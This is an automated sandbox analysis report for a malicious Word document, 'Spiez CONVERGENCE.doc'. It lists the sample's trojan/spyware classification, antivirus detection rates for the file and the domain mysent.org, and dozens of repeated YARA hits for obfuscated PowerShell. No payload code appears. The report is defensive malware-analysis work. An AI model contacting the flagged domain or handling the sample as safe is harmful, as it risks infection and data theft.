Analysis Report

Overview

General Information

Joe Sandbox Version:	22.0.0
Analysis ID:	586205
Start time:	13:44:02
Joe Sandbox Product:	Cloud
Start date:	19.06.2018
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Spiez CONVERGENCE.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@52/33@16/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Correcting counters for adjusted boot time Found application associated with file extension: .doc Found Word or Excel or PowerPoint document Simulate clicks Number of clicks 0 Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Execution Graph export aborted for target mshta.exe, PID 4000 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, powershell.exe, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: mysent.org

virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: Spiez CONVERGENCE.doc

virustotal: Detection: 52%

Perma Link

Yara signature match

Show sources

Source: 00000001.00000002.16470021362.05457000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000001.00000002.16471643789.05D66000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000001.00000002.16479129493.07B20000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251752367.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251811007.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251871858.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251952862.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511624641.000C0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511858528.004E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511656893.000E8000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511692083.000FE000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000003.16252061690.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252582166.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252700862.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252640147.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252495561.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516367054.00240000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000003.16252867730.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16252991335.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16253360353.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16253534240.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000002.16254060832.00280000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000002.16254080364.002A7000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000002.16254122513.00410000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000003.16253657832.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16253760975.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16253931601.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16254018589.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16254142755.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16253457890.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16517606816.002E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16517720716.00370000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16518717374.01280000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16518634850.01260000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16518183828.005A0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516412332.00350000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516456299.0038D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516425523.00377000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16254299738.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257125734.00386000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257155189.00355000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257356049.0035A000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257308570.0032B000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16266903266.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257262767.00310000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16269518741.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16269739444.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16269838618.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278676993.000B0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16517628488.00307000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278810878.00114000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280469364.007F0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280477576.00800000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278760458.000F7000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280487798.00810000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278724742.000D0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000003.16270011304.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280536226.0158D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000008.00000002.16289167708.00123000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313509174.004C4000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313596373.00504000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313702173.00534000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313610905.0050D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16297070594.0053A000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298019408.005CA000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298064731.005CB000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298398000.0052D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298407717.00530000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298971996.004D1000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16299132829.0052D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16299341957.00530000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300255520.0052D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300263613.00530000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300337195.004C3000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300979933.0052D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300788955.00530000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16281065527.01F78000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16302598190.00504000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16303926726.00504000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16304261000.005B8000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16304546872.005BA000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16304603512.005BD000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16305887929.005C0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16296997137.0052F000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296484704.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296593702.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296702253.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296808424.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525541083.00150000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525844730.003F8000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16296929519.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16298971392.003E1000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16298807624.003FC000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16298689577.003F1000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16297805127.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16298307990.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16298524959.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16298084982.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525795636.003E1000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530163707.00396000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530128762.00370000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525712693.003B0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525762372.003D7000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530199944.003A5000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530262653.005E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000003.16298709914.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
